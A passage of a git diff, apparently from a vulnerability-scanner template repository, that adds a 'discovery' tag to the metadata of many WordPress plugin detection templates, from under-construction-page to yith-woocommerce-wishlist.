a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/unyson.yaml b/http/technologies/wordpress/plugins/unyson.yaml index 0e07108062b..d915fc67c89 100644 --- a/http/technologies/wordpress/plugins/unyson.yaml +++ b/http/technologies/wordpress/plugins/unyson.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: unyson wpscan: https://wpscan.com/plugin/unyson - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index a974ef0be1f..7238e124cec 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 08f9fc56b49..6ddf08bd29c 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 8353df48d42..6bb6652f2ba 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/userfeedback-lite.yaml b/http/technologies/wordpress/plugins/userfeedback-lite.yaml index 1d4ad2b94a4..a244d32b113 100644 --- a/http/technologies/wordpress/plugins/userfeedback-lite.yaml +++ b/http/technologies/wordpress/plugins/userfeedback-lite.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: userfeedback-lite wpscan: https://wpscan.com/plugin/userfeedback-lite - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4bcc56e818c..7fa36bbdd91 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 1fb19c56c51..8917255a265 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index c60afb21051..016b1890e31 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e89be602a08..75512fbca66 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index ab9b2b875f3..4c52503c395 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f1c291319ac..9f93b939e32 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index bc593dbad6c..c3b87f4e338 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woo-inpost.yaml b/http/technologies/wordpress/plugins/woo-inpost.yaml index 6da99a6e6a2..9a3e306c540 100644 --- a/http/technologies/wordpress/plugins/woo-inpost.yaml +++ b/http/technologies/wordpress/plugins/woo-inpost.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-inpost wpscan: https://wpscan.com/plugin/woo-inpost - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index b725a6847b2..5ff5b4ee15d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 500d77cd11d..3f7e60ddea8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 217dc13cde6..ef37126c402 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index c4aa36d2341..66fafff6350 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-legacy-rest-api wpscan: https://wpscan.com/plugin/woocommerce-legacy-rest-api - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index d92639a5f33..7f287810edd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index dd4d7e2783a..a79e2c704d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 18c28835ab3..86a7b1ba4d9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index ce25f9afc6f..99d8aa50590 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 38d5c3a530f..b0c8668fba0 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 5ddf22a602b..bde1b5de415 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 55b5527b695..aaa4b4b9941 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wordpress-plugin-detect.yaml b/http/technologies/wordpress/plugins/wordpress-plugin-detect.yaml index c88187c7103..18a025ff8bd 100644 --- a/http/technologies/wordpress/plugins/wordpress-plugin-detect.yaml +++ b/http/technologies/wordpress/plugins/wordpress-plugin-detect.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: - http.component:"wordpress" - tags: tech,wp,wordpress,plugin,detection,wp-plugin + tags: tech,wp,wordpress,plugin,detection,wp-plugin,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index bdc60360b1d..f77353e28d1 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wordpress-woosidebars.yaml b/http/technologies/wordpress/plugins/wordpress-woosidebars.yaml index 4766ef34aa0..a2d17d19188 100644 --- a/http/technologies/wordpress/plugins/wordpress-woosidebars.yaml +++ b/http/technologies/wordpress/plugins/wordpress-woosidebars.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: woosidebars wpscan: https://wpscan.com/plugin/woosidebars - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b377550a5e4..a19b579e5b4 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 0f537681834..f60495d9818 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-crontrol wpscan: https://wpscan.com/plugin/wp-crontrol - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index e516bf83c74..a26790604b9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index a1bac75502f..68f0149f8cc 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 99272044c6f..91d466f2012 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 445ce4e7ac5..dd061b0dcbf 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-mail-logging wpscan: https://wpscan.com/plugin/wp-mail-logging - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 5cfeba0004e..eb51721f906 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index aca0f2d1d8f..70faf8a7a27 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 6141a18c7a0..0206aa2102a 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 93f57fe760c..adf2a9e674d 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index ab67f14d438..4907a32be95 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index f3cc8aec7af..285b7d3f786 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 84209c0bb5b..64d9aa7d763 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 2cc31dce51e..b167202feef 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index dca98b0421f..9f919650489 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 8e7427680b7..57324a5fb93 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a72742c1abd..e077af9ca17 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index b346f069d6f..c55698d48e5 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index b648c2652dc..f29196bd23d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index d3871ceeb18..baf8a481346 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index 8d0abc813cc..3b6bd9cedaa 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 1f0eda470d2..060ad04fa04 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ecaa97d1af2..c3dc126c41a 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 57e2b8ef643..1b334c35a78 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 8fe798ffc6a..7434910abe0 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 430b2db9b85..2cfa6714933 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml index e282fb3aabe..d9fdf70973e 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: yith-woocommerce-compare wpscan: https://wpscan.com/plugin/yith-woocommerce-compare - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 1ae1d15c994..2351b94ae70 